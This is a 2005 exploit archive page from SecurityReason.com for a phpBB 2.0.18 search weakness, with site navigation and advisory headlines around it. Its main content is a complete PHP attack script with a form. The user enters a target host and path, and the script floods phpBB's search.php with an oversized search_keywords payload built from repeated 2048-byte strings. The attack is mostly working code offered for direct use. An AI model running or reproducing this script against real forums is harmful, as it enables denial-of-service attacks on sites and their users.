SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityReason Exploit

Arrow  Topic : phpBB 2.0.18 sql query problem
Arrow  ExploitAlert : 4
Arrow  Credit : Maksymilian Arciemowicz
Arrow  Date : 11.11.2005

  Download

FREEWARE Network Scanner Security Events Montoring
Detect network vulnerabilities. Freeware dld! Monitor event logs for security. Dld 30-day eval!

Arrow  Exploit Code :  

<?
#
# phpBB2018 examples errors
# SecurityReason.Com (Maksymilian Arciemowicz)
# cxib [at] securityreason [dot] com
# http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
#

if(isset($_POST['HOST']) AND isset($_POST['CAT']) AND
isset($_POST['ILE'])){

$POSTx="SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCo
mSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecuri
tyReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReaso
nComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSec
urityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityRe
asonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCom
SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurit
yReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReason
ComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecu
rityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityRea
sonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComS
ecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurity
ReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonC
omSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecur
ityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReas
onComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSe
curityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityR
easonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCo
mSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecuri
tyReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReaso
nComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSec
urityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityRe
asonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCom
SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurit
yReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReason
ComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecu
rityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityRea
sonComSecurityReasonComSecurity"; # 2048b

$POST = "mode=results&search_keywords=";

for($x=1; $x<=$_POST['ILE']; $x++){
$POST .= $POSTx; # f(x)=x * 2048b
}


$sock = fsockopen($_POST['HOST'], 80);
if (!$sock) {return false;}

$out = "POST ".$_POST['CAT']."search.php HTTP/1.1\r\n";
$out .= "Host: ".$_POST['HOST']."\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\n";
$out .= "Content-Length: ".strlen($POST)."\n\n";
$out .= $POST."\r\n";

fwrite($sock, $out);

$data="";
while(!feof($sock)) {
$data .= fread($sock,4096);
}

fclose($sock);
$data = substr($data, strpos($data,"\r\n\r\n")+4);

echo $data;

} else {

echo "<CENTER>
<A HREF=\"http://securityreason.com\"><IMG
SRC=\"http://securityreason.com/gfx/small_log
o.png\"></A><P>
<FORM action=\"\" method=post enctype=\"multipart/form-data\">
HOST: <input TYPE=\"text\" name=\"HOST\"> Like www.securityreason.com<br>
CATALOG: <input TYPE=\"text\" name=\"CAT\"> Like: /phpBB2/<br>
f(x)= <input TYPE=\"text\" name=\"ILE\" value=\"512\"> x 2048b (example 512
x 2048)<br>
<input TYPE=\"submit\" value=\"Send\">
</FORM>";

}
?>

Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.